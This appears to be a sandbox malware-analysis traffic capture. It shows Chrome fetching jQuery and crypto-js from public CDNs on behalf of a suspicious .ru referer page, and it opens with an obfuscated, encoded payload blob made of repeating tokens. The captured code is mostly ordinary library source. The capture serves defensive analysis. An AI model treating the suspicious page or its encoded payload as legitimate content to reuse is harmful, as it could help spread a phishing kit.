                                    2025-02-19 19:40:05 UTC1369INData Raw: 37 66 66 61 0d 0a 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f
                                    Data Ascii: 7ffa++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOO
                                    2025-02-19 19:40:05 UTC1369INData Raw: 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46
                                    Data Ascii: OOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpO++oO++oOOFpO++oOOFpO++oO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpO++oOOFpOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oOOFpO++oO++oOOFpOOF
                                    2025-02-19 19:40:05 UTC1369INData Raw: 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f
                                    Data Ascii: OFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oOOFpO++oO++oOOFpO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++o


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.649728151.101.66.1374431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:06 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                    Host: code.jquery.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://i2.ictacquist.ru/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-02-19 19:40:06 UTC613INHTTP/1.1 200 OK
                                    Connection: close
                                    Content-Length: 89501
                                    Server: nginx
                                    Content-Type: application/javascript; charset=utf-8
                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                    ETag: "28feccc0-15d9d"
                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Via: 1.1 varnish, 1.1 varnish
                                    Accept-Ranges: bytes
                                    Date: Wed, 19 Feb 2025 19:40:06 GMT
                                    Age: 1235608
                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740043-EWR
                                    X-Cache: HIT, HIT
                                    X-Cache-Hits: 2774, 5
                                    X-Timer: S1739994007.946344,VS0,VE0
                                    Vary: Accept-Encoding
                                    2025-02-19 19:40:06 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                    2025-02-19 19:40:06 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                    2025-02-19 19:40:06 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                    2025-02-19 19:40:06 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                    2025-02-19 19:40:06 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                    2025-02-19 19:40:06 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                    2025-02-19 19:40:06 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                    2025-02-19 19:40:06 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                    2025-02-19 19:40:06 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                    2025-02-19 19:40:06 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.649731104.17.24.144431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:06 UTC650OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                    Host: cdnjs.cloudflare.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://i2.ictacquist.ru/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-02-19 19:40:07 UTC958INHTTP/1.1 200 OK
                                    Date: Wed, 19 Feb 2025 19:40:06 GMT
                                    Content-Type: application/javascript; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Access-Control-Allow-Origin: *
                                    Cache-Control: public, max-age=30672000
                                    ETag: W/"61182885-40eb"
                                    Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                    cf-cdnjs-via: cfworker/kv
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Timing-Allow-Origin: *
                                    X-Content-Type-Options: nosniff
                                    CF-Cache-Status: HIT
                                    Age: 132902
                                    Expires: Mon, 09 Feb 2026 19:40:06 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IF5DNNYBX%2BPfk0fQMW6WIheurXpjSO%2FbiM7uY21uv71MMkuD059Q7STU%2BSZQrhowpTDeQxVgzNsxXqZvg9Zh4VThUhljTdIVKzET4AmiIbMv4KbViGj6m1mPnVAEjURTQvk5466R"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                    Strict-Transport-Security: max-age=15780000
                                    Server: cloudflare
                                    CF-RAY: 9148ba0f9e30c34a-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2025-02-19 19:40:07 UTC411INData Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                    Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                    2025-02-19 19:40:07 UTC1369INData Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                    Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
                                    2025-02-19 19:40:07 UTC1369INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 